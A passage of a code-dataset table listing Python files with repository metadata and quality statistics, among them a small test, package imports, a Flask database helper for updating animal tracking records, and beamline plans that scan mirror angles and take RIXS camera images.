hexsha string | size int64 | ext string | lang string | max_stars_repo_path string | max_stars_repo_name string | max_stars_repo_head_hexsha string | max_stars_repo_licenses list | max_stars_count int64 | max_stars_repo_stars_event_min_datetime string | max_stars_repo_stars_event_max_datetime string | max_issues_repo_path string | max_issues_repo_name string | max_issues_repo_head_hexsha string | max_issues_repo_licenses list | max_issues_count int64 | max_issues_repo_issues_event_min_datetime string | max_issues_repo_issues_event_max_datetime string | max_forks_repo_path string | max_forks_repo_name string | max_forks_repo_head_hexsha string | max_forks_repo_licenses list | max_forks_count int64 | max_forks_repo_forks_event_min_datetime string | max_forks_repo_forks_event_max_datetime string | content string | avg_line_length float64 | max_line_length int64 | alphanum_fraction float64 | qsc_code_num_words_quality_signal int64 | qsc_code_num_chars_quality_signal float64 | qsc_code_mean_word_length_quality_signal float64 | qsc_code_frac_words_unique_quality_signal float64 | qsc_code_frac_chars_top_2grams_quality_signal float64 | qsc_code_frac_chars_top_3grams_quality_signal float64 | qsc_code_frac_chars_top_4grams_quality_signal float64 | qsc_code_frac_chars_dupe_5grams_quality_signal float64 | qsc_code_frac_chars_dupe_6grams_quality_signal float64 | qsc_code_frac_chars_dupe_7grams_quality_signal float64 | qsc_code_frac_chars_dupe_8grams_quality_signal float64 | qsc_code_frac_chars_dupe_9grams_quality_signal float64 | qsc_code_frac_chars_dupe_10grams_quality_signal float64 | qsc_code_frac_chars_replacement_symbols_quality_signal float64 | qsc_code_frac_chars_digital_quality_signal float64 | qsc_code_frac_chars_whitespace_quality_signal float64 | qsc_code_size_file_byte_quality_signal float64 | qsc_code_num_lines_quality_signal float64 | qsc_code_num_chars_line_max_quality_signal float64 | qsc_code_num_chars_line_mean_quality_signal float64 | qsc_code_frac_chars_alphabet_quality_signal float64 | qsc_code_frac_chars_comments_quality_signal float64 | qsc_code_cate_xml_start_quality_signal float64 | qsc_code_frac_lines_dupe_lines_quality_signal float64 | qsc_code_cate_autogen_quality_signal float64 | qsc_code_frac_lines_long_string_quality_signal float64 | qsc_code_frac_chars_string_length_quality_signal float64 | qsc_code_frac_chars_long_word_length_quality_signal float64 | qsc_code_frac_lines_string_concat_quality_signal float64 | qsc_code_cate_encoded_data_quality_signal float64 | qsc_code_frac_chars_hex_words_quality_signal float64 | qsc_code_frac_lines_prompt_comments_quality_signal float64 | qsc_code_frac_lines_assert_quality_signal float64 | qsc_codepython_cate_ast_quality_signal float64 | qsc_codepython_frac_lines_func_ratio_quality_signal float64 | qsc_codepython_cate_var_zero_quality_signal bool | qsc_codepython_frac_lines_pass_quality_signal float64 | qsc_codepython_frac_lines_import_quality_signal float64 | qsc_codepython_frac_lines_simplefunc_quality_signal float64 | qsc_codepython_score_lines_no_logic_quality_signal float64 | qsc_codepython_frac_lines_print_quality_signal float64 | qsc_code_num_words int64 | qsc_code_num_chars int64 | qsc_code_mean_word_length int64 | qsc_code_frac_words_unique null | qsc_code_frac_chars_top_2grams int64 | qsc_code_frac_chars_top_3grams int64 | qsc_code_frac_chars_top_4grams int64 | qsc_code_frac_chars_dupe_5grams int64 | qsc_code_frac_chars_dupe_6grams int64 | qsc_code_frac_chars_dupe_7grams int64 | qsc_code_frac_chars_dupe_8grams int64 | qsc_code_frac_chars_dupe_9grams int64 | qsc_code_frac_chars_dupe_10grams int64 | qsc_code_frac_chars_replacement_symbols int64 | qsc_code_frac_chars_digital int64 | qsc_code_frac_chars_whitespace int64 | qsc_code_size_file_byte int64 | qsc_code_num_lines int64 | qsc_code_num_chars_line_max int64 | qsc_code_num_chars_line_mean int64 | qsc_code_frac_chars_alphabet int64 | qsc_code_frac_chars_comments int64 | qsc_code_cate_xml_start int64 | qsc_code_frac_lines_dupe_lines int64 | qsc_code_cate_autogen int64 | qsc_code_frac_lines_long_string int64 | qsc_code_frac_chars_string_length int64 | qsc_code_frac_chars_long_word_length int64 | qsc_code_frac_lines_string_concat null | qsc_code_cate_encoded_data int64 | qsc_code_frac_chars_hex_words int64 | qsc_code_frac_lines_prompt_comments int64 | qsc_code_frac_lines_assert int64 | qsc_codepython_cate_ast int64 | qsc_codepython_frac_lines_func_ratio int64 | qsc_codepython_cate_var_zero int64 | qsc_codepython_frac_lines_pass int64 | qsc_codepython_frac_lines_import int64 | qsc_codepython_frac_lines_simplefunc int64 | qsc_codepython_score_lines_no_logic int64 | qsc_codepython_frac_lines_print int64 | effective string | hits int64 |
|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|
dc9400c836edc2337fc4481c23e98aace28f70fe | 142 | py | Python | tests/test_user_interface.py | FunTimeCoding/python-utility | e91df316684a07161aae33576329f9092d2e97e6 | [
"MIT"
] | null | null | null | tests/test_user_interface.py | FunTimeCoding/python-utility | e91df316684a07161aae33576329f9092d2e97e6 | [
"MIT"
] | null | null | null | tests/test_user_interface.py | FunTimeCoding/python-utility | e91df316684a07161aae33576329f9092d2e97e6 | [
"MIT"
] | null | null | null | from python_utility.user_interface import UserInterface
def test_user_interface() -> None:
assert UserInterface(screen=None).run() == 1
| 23.666667 | 55 | 0.774648 | 18 | 142 | 5.888889 | 0.777778 | 0.245283 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.008065 | 0.126761 | 142 | 5 | 56 | 28.4 | 0.846774 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.333333 | 1 | 0.333333 | true | 0 | 0.333333 | 0 | 0.666667 | 0 | 1 | 0 | 0 | null | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 1 | 1 | 0 | 1 | 0 | 0 | 0 | 0 | 6 |
dc9f8f26c3e610ce99362498503601b186203c77 | 155 | py | Python | linenplus/__init__.py | ikostrikov/linenplus | bce47f0997ed1fc33866bafccc9b7cf2c7ce8370 | [
"MIT"
] | null | null | null | linenplus/__init__.py | ikostrikov/linenplus | bce47f0997ed1fc33866bafccc9b7cf2c7ce8370 | [
"MIT"
] | null | null | null | linenplus/__init__.py | ikostrikov/linenplus | bce47f0997ed1fc33866bafccc9b7cf2c7ce8370 | [
"MIT"
] | null | null | null | from linenplus import mlp_resnet_v2, resnet_v2
from linenplus.sequential import Sequential
from linenplus.weight_standardization import WSConv, WSDense
| 38.75 | 61 | 0.864516 | 20 | 155 | 6.5 | 0.55 | 0.3 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.014493 | 0.109677 | 155 | 3 | 62 | 51.666667 | 0.927536 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | true | 0 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | null | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | 6 |
f4befb2f4092ce696ec712301dac58af5add7051 | 42 | py | Python | alchemist_lib/portfolio/__init__.py | Dodo33/alchemist-lib | 40c2d3b48d5f46315eb09e7f572d578b7e5324b4 | [
"MIT"
] | 5 | 2018-07-11T05:38:51.000Z | 2021-12-19T03:06:51.000Z | alchemist_lib/portfolio/__init__.py | Dodo33/alchemist-lib | 40c2d3b48d5f46315eb09e7f572d578b7e5324b4 | [
"MIT"
] | null | null | null | alchemist_lib/portfolio/__init__.py | Dodo33/alchemist-lib | 40c2d3b48d5f46315eb09e7f572d578b7e5324b4 | [
"MIT"
] | 2 | 2019-07-12T08:51:11.000Z | 2021-09-29T22:22:46.000Z | from .longsonly import LongsOnlyPortfolio
| 21 | 41 | 0.880952 | 4 | 42 | 9.25 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.095238 | 42 | 1 | 42 | 42 | 0.973684 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | true | 0 | 1 | 0 | 1 | 0 | 1 | 1 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | 6 |
f4c1cd169e1b567ff9c08af28cd67b05c4249e19 | 56 | py | Python | enums/__init__.py | HCI901E20/P9-Embedded | 75648d8240ae386331f9bcd1d19940db0ac93512 | [
"MIT"
] | null | null | null | enums/__init__.py | HCI901E20/P9-Embedded | 75648d8240ae386331f9bcd1d19940db0ac93512 | [
"MIT"
] | null | null | null | enums/__init__.py | HCI901E20/P9-Embedded | 75648d8240ae386331f9bcd1d19940db0ac93512 | [
"MIT"
] | 1 | 2021-02-02T07:39:21.000Z | 2021-02-02T07:39:21.000Z | from .direction_enum import *
from .status_enum import * | 28 | 29 | 0.803571 | 8 | 56 | 5.375 | 0.625 | 0.465116 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.125 | 56 | 2 | 30 | 28 | 0.877551 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | true | 0 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | null | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | 6 |
76314c428edf5d059f1f6640b78ef748b00e526a | 6,487 | py | Python | www/Python Code/update_details.py | GsProjects/ProjectCode | 771d660ad161edccc3f2153e1fdc442e6f2976d3 | [
"ECL-2.0",
"Apache-2.0"
] | null | null | null | www/Python Code/update_details.py | GsProjects/ProjectCode | 771d660ad161edccc3f2153e1fdc442e6f2976d3 | [
"ECL-2.0",
"Apache-2.0"
] | null | null | null | www/Python Code/update_details.py | GsProjects/ProjectCode | 771d660ad161edccc3f2153e1fdc442e6f2976d3 | [
"ECL-2.0",
"Apache-2.0"
] | null | null | null | from flask import json
from connector import create_connection
def update_animal_details(animal_identifier, animal_type, animal_breed, animal_weight, animal_gender, tracking_number, oldtracking_number, oldanimal_identifier, owner):
if animal_identifier == '' or animal_type == '' or animal_breed == '' or animal_weight =='' or animal_gender =='' or tracking_number =='':
Result = json.dumps({"status": "Empty fields"})
return Result
if animal_gender != 'M' and animal_gender != 'F' and animal_gender != 'm' and animal_gender != 'f':
overall_result = json.dumps({"status": "Wrong gender"})
return overall_result
if animal_identifier == oldanimal_identifier and tracking_number == oldtracking_number:
update_animal_table(animal_identifier, animal_type, animal_breed, animal_weight, animal_gender, tracking_number, oldtracking_number)
update_coordinates_table(tracking_number, oldtracking_number)
Result = json.dumps({"status": "Updated Successfully"})
return Result
if animal_identifier == oldanimal_identifier and tracking_number != oldtracking_number:
associated_owners = check_id_existance(tracking_number)
if len(associated_owners) != 0:
for item in associated_owners:
if item[0] == owner:
update_animal_table(animal_identifier, animal_type, animal_breed, animal_weight, animal_gender, tracking_number, oldtracking_number)
update_coordinates_table(tracking_number, oldtracking_number)
Result = json.dumps({"status": "Updated Successfully"})
return Result
else:
Result = json.dumps({"status": "Tracking number already in use"})
return Result
else:
update_animal_table(animal_identifier, animal_type, animal_breed, animal_weight, animal_gender, tracking_number, oldtracking_number)
update_coordinates_table(tracking_number, oldtracking_number)
Result = json.dumps({"status": "Updated Successfully"})
return Result
if tracking_number == oldtracking_number and animal_identifier != oldanimal_identifier:
associated_owners = check_name_existance(animal_identifier)
if len(associated_owners) != 0:
for ids in associated_owners:
if ids[0] == tracking_number:
update_animal_table(animal_identifier, animal_type, animal_breed, animal_weight, animal_gender, tracking_number, oldtracking_number)
update_coordinates_table(tracking_number, oldtracking_number)
Result = json.dumps({"status": "Updated Successfully"})
return Result
else:
Result = json.dumps({"status": "Animal ID associated with another animal"})
return Result
else:
update_animal_table(animal_identifier, animal_type, animal_breed, animal_weight, animal_gender, tracking_number, oldtracking_number)
update_coordinates_table(tracking_number, oldtracking_number)
Result = json.dumps({"status": "Updated Successfully"})
return Result
if tracking_number != oldtracking_number and animal_identifier != oldanimal_identifier:
associated_animal_names = check_name_existance(animal_identifier)
associated_owners_ids = check_id_existance(tracking_number)
if len(associated_animal_names) != 0 and len(associated_owners_ids) != 0:
for ids in associated_animal_names:#each trackingID
for item in associated_owners_ids:#each name
if item[0] == owner and ids[0] == tracking_number:
update_animal_table(animal_identifier, animal_type, animal_breed, animal_weight, animal_gender, tracking_number, oldtracking_number)
update_coordinates_table(tracking_number, oldtracking_number)
Result = json.dumps({"status": "Updated Successfully"})
return Result
else:
if item[0] != owner:
Result = json.dumps({"status": "Tracking number already in use"})
return Result
if ids[0] != tracking_number:
Result = json.dumps({"status": "Animal ID associated with another animal"})
return Result
else:
update_animal_table(animal_identifier, animal_type, animal_breed, animal_weight, animal_gender, tracking_number, oldtracking_number)
update_coordinates_table(tracking_number, oldtracking_number)
Result = json.dumps({"status": "Updated Successfully"})
return Result
def update_animal_table(animalIdentifier, animal_type, animal_breed, animal_weight, animal_gender, tracking_number, oldtracking_number):
cnx2 = create_connection()
cursor = cnx2.cursor()
query = ("Update Animal set animalIdentifier = BINARY %s,typeAnimal = BINARY %s,breedAnimal = BINARY %s,weightAnimal = %s,genderAnimal = BINARY %s,trackingID = %s where trackingID = %s")
cursor.execute(query, (animalIdentifier, animal_type, animal_breed, animal_weight, animal_gender, tracking_number, oldtracking_number))
cnx2.commit()
cursor.close()
cnx2.close()
def update_coordinates_table(tracking_number, oldtracking_number):
cnx2 = create_connection()
cursor = cnx2.cursor()
query = ("Update currentCoordinates set trackingID = %s where trackingID = %s")
cursor.execute(query, (tracking_number, oldtracking_number))
cnx2.commit()
cursor.close()
cnx2.close()
def check_name_existance(animalIdentifier):
cnx2 = create_connection()
cursor = cnx2.cursor()
query = ("Select trackingID from Animal where animalIdentifier = BINARY %s")
cursor.execute(query, (animalIdentifier,))
result = cursor.fetchall()
cursor.close()
cnx2.close()
return result
def check_id_existance(tracking_number):
cnx2 = create_connection()
cursor = cnx2.cursor()
query = ("Select ownerID from Animal where trackingID = %s")
cursor.execute(query,(tracking_number,))
result = cursor.fetchall()
cursor.close()
cnx2.close()
return result
| 53.172131 | 190 | 0.661168 | 674 | 6,487 | 6.077151 | 0.114243 | 0.112793 | 0.140381 | 0.174072 | 0.837891 | 0.785156 | 0.764648 | 0.745117 | 0.665039 | 0.639648 | 0 | 0.00498 | 0.25713 | 6,487 | 121 | 191 | 53.61157 | 0.844989 | 0.0037 | 0 | 0.638095 | 0 | 0.009524 | 0.114396 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.047619 | false | 0 | 0.019048 | 0 | 0.209524 | 0 | 0 | 0 | 0 | null | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 6 |
5224d741710de90df0e81f040a9e05049dc5b578 | 91,615 | py | Python | plans/03-plan.py | mrakitin/profile_collection-six | 20e41632b9898ac83a8e60fcca9b8aeaaa91f0ad | [
"BSD-3-Clause"
] | null | null | null | plans/03-plan.py | mrakitin/profile_collection-six | 20e41632b9898ac83a8e60fcca9b8aeaaa91f0ad | [
"BSD-3-Clause"
] | null | null | null | plans/03-plan.py | mrakitin/profile_collection-six | 20e41632b9898ac83a8e60fcca9b8aeaaa91f0ad | [
"BSD-3-Clause"
] | null | null | null | #2018/02/24 Gas Cell @ N-edge
def test_extra_staging(exp_time=10):
yield from rixscam_extra_stage(exp_time)
yield from mv(rixscam.cam.acquire_time,exp_time)
yield from count([rixscam], md = {'reason':'fake data'})
yield from rixscam_extra_unstage()
print(rixscam.cam.acquire_time.value,'\n')
print('now i should be moving and collecting/cleaning')
for i in range(exp_time*2):
print('moving and cleaning')
yield from sleep(1)
print(rixscam.cam.acquire_time.value,'\n')
yield from rixscam_extra_stage(exp_time)
yield from mv(rixscam.cam.acquire_time,exp_time)
yield from count([rixscam], md = {'reason':'fake data'})
yield from rixscam_extra_unstage()
print(rixscam.cam.acquire_time.value,'\n')
print('now i should be moving & cleaning')
for i in range(int(exp_time*0.5)):
print('moving and cleaning')
yield from sleep(1)
print('DONE now i should be cleaning, for real now, but lets check with one last scan')
yield from rixscam_extra_stage(exp_time)
yield from mv(rixscam.cam.acquire_time,exp_time)
yield from count([rixscam], md = {'reason':'fake data'})
yield from rixscam_extra_unstage()
print(rixscam.cam.acquire_time.value,'\n')
print('now i should be cleaning')
def rixscam_extra_stage(exp_time): #this is hear for now so that we know we have a good first image. need more testing.
yield from mv(rixscam.cam.acquire, 0)
yield from mv(rixscam.cam.image_mode,'Multiple')
yield from sleep(1.03+3.5) #for readout
yield from mv(rixscam.cam.acquire_time, exp_time) #because the camera is always behind by 1
yield from mv(rixscam.cam.acquire,1) # This takes the place of the dummy image
yield from sleep(1.03 + 3.5)
print('\n\tDetector ready to take data. If you RE.abort, then RE(rixscam_extra_unstage())\n\n')
def rixscam_extra_unstage(): #exp_time not needed if we can monitor the image mode
print('\tPreparing rixscam for "constant charge cleaning". If this takes a long time, then we know that there is a need for an extra image')
yield from mv(rixscam.cam.acquire_time, 1)
yield from sleep(1.03) # if above is put_complete, then we don't need this.
yield from mv(rixscam.cam.acquire,1) # because camera is always behind by 1 so we fake a dummy image
#yield from sleep(3.3+exp_time) # if above is put_complete, then we don't need this.
while(rixscam.cam.image_mode.value != 2): # maybe this is better than waiting exp_time+3.3 s. (readout time is just under 3 for full image)
#while(rixscam.cam.acquire.value = 1): # maybe this is better than waiting exp_time+3.3 s. (readout time is just under 3 for full image)
yield from mv(rixscam.cam.image_mode,'Continuous')
# # add overwite statement to tell user what is happening
yield from sleep(1.03) # should not be needed, but it seems that the rememants of the last exposure time are present, and put_complete is not working appropriately
yield from mv(rixscam.cam.acquire, 1)
print('\n\tDetector is "Collecting" in exposure mode {} (2 is continuous) for {} s\n\n'.format(rixscam.cam.image_mode.value,rixscam.cam.acquire_time.value))
def rixscam_multi_image(num_images,extra_md =' ', take_dark = False):
f_string = ''
yield from mv(gvbt1,'open')
yield from count([rixscam],md={'reason':'dummy'})
for i in range(0,num_images):
uid = yield from count([rixscam],md={'reason':'multi image scan,{} of {}. {}'.format(i+1,num_images,extra_md) })
if uid == None:
uid = -1
f_string += 'scan no ' + str(db[uid].start['scan_id']) + ': image ' + str(i+1) + ' of ' + str(num_images) + '\n'
if take_dark is True:
yield from mv(gvsc1,'close')
uid = yield from count([rixscam],num=1, md = {'reason':'gv:sc1 dark'})
if uid == None:
uid = -1
f_string += 'scan no ' + str(db[uid].start['scan_id']) + ': dark \n'
yield from mv(gvsc1,'open')
yield from mv(gvbt1,'close')
print(f_string)
def rixscam_multi_image_best(exp_time, num_images,extra_md =' '):
yield from mv(gvbt1,'open')
yield from rixscam_extra_stage(exp_time)
uid = yield from count([rixscam],md={'reason':'multi image scan, 1 of {}. {}'.format(num_images, extra_md) })
if uid is not None:
scan_id = db[uid].start['scan_id']
else:
scan_id='not yet run'
for i in range(0,num_images):
yield from count([rixscam],md={'reason':'multi image scan,{} of {}. {}'.format(i+1,num_images,extra_md) })
yield from mv(gvbt1,'close')
yield from rixscam_extra_unstage()
def some_image(dets=[rixscam],exp_time=600,num_ims = 6, sample = 'Multilayer'):
f_string = ''
#yield from rixscam_extra_stage(exp_time)
yield from mv(rixscam.cam.acquire_time, exp_time)
yield from mv(gvbt1,'open')
for i in range(num_ims):
uid = yield from count(dets, md = {'reason':'{} {} of {} 100um vg'.format(sample, i, num_ims)})
if uid == None:
uid = -1
f_string += 'scan no ' + str(db[uid].start['scan_id']) + ': sample = ' + str(sample) + ' 100um vg\n'
yield from mv(extslt.vg, 50)
for i in range(num_ims*2):
uid = yield from count(dets, md = {'reason':'{} {} of {} 50um vg'.format(sample, i, num_ims)})
if uid == None:
uid = -1
f_string += 'scan no ' + str(db[uid].start['scan_id']) + ': sample = ' + str(sample) + ' 50um vg\n'
#yield from rixscam_extra_unstage()
yield from mv(gvbt1,'close')
print(f_string)
def multi_image(dets=[rixscam], num_ims=1, exp_time=1): #qem12#
try:
f_string='\n---------Scan Summary---------\n'
sample = 'ndnio3'
yield from rixscam_extra_stage(exp_time)
yield from mv(rixscam.cam.acquire_time, exp_time)
for i in range(num_ims):
uid = yield from count(dets, md = {'reason':'{} {} of {} 100um vg'.format(sample, i, num_ims)})
if uid == None:
uid = -1
f_string += 'scan no ' + str(db[uid].start['scan_id']) + ': sample = ' + str(sample) + ' 100um vg \n'
yield from rixscam_extra_unstage()
yield from mv(cryo.x, 34, cryo.y, 74, cryo.z, 42)
sample = 'carbon'
yield from rixscam_extra_stage(exp_time)
yield from mv(rixscam.cam.acquire_time, exp_time)
for i in range(num_ims):
uid = yield from count(dets, md = {'reason':'{} {} of {} 100um vg'.format(sample, i, num_ims)})
if uid == None:
uid = -1
f_string += 'scan no ' + str(db[uid].start['scan_id']) + ': sample = ' + str(sample) + ' 100um vg\n'
yield from rixscam_extra_unstage()
yield from mv(extslt.vg, 30)
sample = 'carbon'
yield from rixscam_extra_stage(exp_time)
yield from mv(rixscam.cam.acquire_time, exp_time)
for i in range(num_ims):
uid = yield from count(dets, md = {'reason':'{} {} of {} 30um vg'.format(sample, i, num_ims)})
if uid == None:
uid = -1
f_string += 'scan no ' + str(db[uid].start['scan_id']) + ': sample = ' + str(sample) + '30um vg\n'
yield from rixscam_extra_unstage()
yield from mv(gvsc1,'close')
sample = 'SCgv Dark'
num_ims = 3
yield from rixscam_extra_stage(exp_time)
yield from mv(rixscam.cam.acquire_time, exp_time)
for i in range(num_ims):
uid = yield from count(dets, md = {'reason':'{} {} of {} '.format(sample, i, num_ims)})
if uid == None:
uid = -1
f_string += 'scan no ' + str(db[uid].start['scan_id']) + ': sample = ' + str(sample) + '\n'
yield from rixscam_extra_unstage()
yield from mv(gvbt1,'close')
print(f_string)
print('\t SAMPLE IS CARBON TAPE \n')
print('\t check esit slit gap \n')
except Exception:
# Catch the exception long enough to clean up.
yield from mv(gvbt1,'close')
print('\n\tSomething bad happened.\n')
print(f_string)
print('\n\tSomething bad happened.\n')
yield from rixscam_extra_unstage()
raise
def rixscam_m6_1_axis( extra_md = ' '):
#according to joe's calcs, 0.5mrad makes a signf change. this is 0.028 deg in m6
# beyond +/- 0.25deg it could be very difficult to see something...especially if focusing well.
x_motor= m6.pit
x_ideal=1.42
x_start= x_ideal + 0.02
x_stop= x_ideal - 0.02
num= 5 #12
yield from mv(gvbt1,'open')
f_string=''
yield from count([rixscam], md = {'reason':'dummy'})
for i in range(num):
x_val = round (x_start + i * (x_stop - x_start) / (num - 1) , 3)
yield from mv (x_motor,x_val)#,y_motor,y_val)
uid = yield from count([rixscam],num=1, md = {'reason':' {}'. format(extra_md)})
if uid == None:
uid = -1
f_string += 'scan no ' + str(db[uid].start['scan_id']) + ': m6_pit = ' + str(x_val) + '\n'#\
# ' , m7_pit = ' + str(y_val) + '\n'
yield from mv(gvsc1,'close')
uid = yield from count([rixscam],num=1, md = {'reason':'gv:sc1 dark'})
if uid == None:
uid = -1
f_string += 'scan no ' + str(db[uid].start['scan_id']) + ': dark \n'
yield from mv(x_motor,x_ideal)#,y_motor, y_ideal)
yield from mv(gvsc1,'open')
uid = yield from count([rixscam],num=1, md = {'reason':'returned to center'})
if uid == None:
uid = -1
f_string += 'scan no ' + str(db[uid].start['scan_id']) + ': m6_pit = ' + str(x_ideal) + '\n'#\
#' , m7_pit = ' + str(y_ideal) + '\n'
yield from mv(gvbt1,'close')
print (f_string)
def rixscam_m6_2_axis_zero_order( extra_md = ' '):
#according to joe's calcs, 0.5mrad makes a signf change. this is 0.028 deg in m6
# beyond +/- 0.25deg it could be very difficult to see something...especially if focusing well.
x_motor= m6.pit
x_ideal=1.41
x_start= x_ideal + 0.02
x_stop= x_ideal - 0.02
num= 5 #12
y_motor= espgm.m7pit
y_ideal= 5.3615
y_start = y_ideal + 0.02
y_stop = y_ideal - 0.02
yield from mv(gvbt1,'open')
f_string=''
yield from count([rixscam], md = {'reason':'dummy'})
for i in range(num):
x_val = round (x_start + i * (x_stop - x_start) / (num - 1) , 3)
y_val = round (y_start + i * (y_stop - y_start) / (num - 1) , 3)
yield from mv (x_motor,x_val,y_motor,y_val)
uid = yield from count([rixscam],num=1, md = {'reason':' {}'. format(extra_md)})
if uid == None:
uid = -1
f_string += 'scan no ' + str(db[uid].start['scan_id']) + ': m6_pit = ' + str(x_val) + '\n'\
' , m7_pit = ' + str(y_val) + '\n'
yield from mv(gvsc1,'close')
uid = yield from count([rixscam],num=1, md = {'reason':'gv:sc1 dark'})
if uid == None:
uid = -1
f_string += 'scan no ' + str(db[uid].start['scan_id']) + ': dark \n'
yield from mv(x_motor,x_ideal,y_motor, y_ideal)
yield from mv(gvsc1,'open')
uid = yield from count([rixscam],num=1, md = {'reason':'returned to center'})
if uid == None:
uid = -1
f_string += 'scan no ' + str(db[uid].start['scan_id']) + ': m6_pit = ' + str(x_ideal) + '\n'\
' , m7_pit = ' + str(y_ideal) + '\n'
yield from mv(gvbt1,'close')
print (f_string)
def rixscam_ow_1_axis( extra_md = ' '):
# to scan optics wheel to find position for parabolic mirrors
# detector subtends and angle of ~0.1 deg
x_motor= ow.th
x_ideal=-30.2918
x_start= x_ideal + 1.0
x_stop= x_ideal - 1.0
num = 41
yield from mv(gvbt1,'open')
f_string=''
yield from count([rixscam], md = {'reason':'dummy'})
for i in range(num):
x_val = round (x_start + i * (x_stop - x_start) / (num - 1) , 3)
yield from mv (x_motor,x_val)#,y_motor,y_val)
uid = yield from count([rixscam],num=1, md = {'reason':' {}'. format(extra_md)})
if uid == None:
uid = -1
f_string += 'scan no ' + str(db[uid].start['scan_id']) + ': ow_th = ' + str(x_val) + '\n'#\
# ' , m7_pit = ' + str(y_val) + '\n'
yield from mv(gvsc1,'close')
if 0: # dark image
uid = yield from count([rixscam],num=1, md = {'reason':'gv:sc1 dark'})
if uid == None:
uid = -1
f_string += 'scan no ' + str(db[uid].start['scan_id']) + ': dark \n'
if 0: # extra measurement at 'ideal' position
yield from mv(x_motor,x_ideal)#,y_motor, y_ideal)
yield from mv(gvsc1,'open')
uid = yield from count([rixscam],num=1, md = {'reason':'returned to center'})
if uid == None:
uid = -1
f_string += 'scan no ' + str(db[uid].start['scan_id']) + ': m6_pit = ' + str(x_ideal) + '\n'#\
#' , m7_pit = ' + str(y_ideal) + '\n'
yield from mv(gvbt1,'close')
print (f_string)
def rixscam_m6_pit_optimization2():
#according to joe's calcs, 0.5mrad makes a signf change. this is 0.028 deg in m6
# beyond +/- 0.25deg it could be very difficult to see something...especially if focusing well.
precison_digit = 4
gr_pit=round(espgm.grpit.user_readback.value,precison_digit)
extra_md = 'gr = {}'.format(gr_pit)
#2500 l/mm grating values (wide range)
#m7_dict={6.17:4.81,6.27:5.075,6.37:5.290,6.47:5.476,6.57:5.652,6.67:5.819}
#x_motor=m6.pit
#x_ideal= 1.35
#x_start= 1.55
#x_stop= 1.2
#y_motor=espgm.m7pit
#y_ideal = m7_dict[gr_pit]
#y_start= y_ideal+8*.025
#y_stop= y_ideal-6*.025
#num = 15
#1250 l/mm grating values (wide range)
#NOTE : grating:m7
#m7_dict={4.85:4.256,4.95:4.452,5.05:4.623,5.09:4.683, 5.12:4.806,5.15:4.778, 5.18:4.8205, 5.25: 4.928, 5.35:5.072,5.45:5.207}
m7_dict={4.9281:4.8445}#6.1385:5.3433,6.3385:5.7303,6.4385:5.9003}
x_motor=m6.pit
x_ideal= 1.3777
x_start= x_ideal+5*.001
x_stop= x_ideal-5*.001
y_motor=espgm.m7pit
y_ideal = m7_dict[gr_pit]
y_start= y_ideal+5*.001
y_stop= y_ideal-5*.001
num = 11
yield from mv(gvbt1,'close')
f_string=''
yield from count([rixscam])
for i in range(num):
x_val = round (x_start + i * (x_stop - x_start) / (num - 1) , precison_digit)
y_val = round (y_start + i * (y_stop - y_start) / (num - 1) , precison_digit)
yield from mv (x_motor,x_val,y_motor,y_val)
yield from sleep(10)
yield from mv(gvbt1,'open')
uid = yield from count([rixscam],num=1, md = {'reason':'{} m6 first order focus - 20um vg'.format(extra_md)})
if uid == None:
uid = -1
f_string += 'scan no ' + str(db[uid].start['scan_id']) + ': m6_pit = ' + str(x_val) + \
' , m7_pit = ' + str(y_val) + '\n'
yield from mv(gvbt1,'close')
yield from mv(gvsc1,'close')
uid = yield from count([rixscam],num=1, md = {'reason':'gv:sc1 dark'})
if uid == None:
uid = -1
f_string += 'scan no ' + str(db[uid].start['scan_id']) + ': dark \n'
yield from mv(x_motor,x_ideal,y_motor, y_ideal)
yield from mv(gvsc1,'open')
#uid = yield from count([rixscam],num=1, md = {'reason':'{} ideal position'.format(extra_md)})
#if uid == None:
# uid = -1
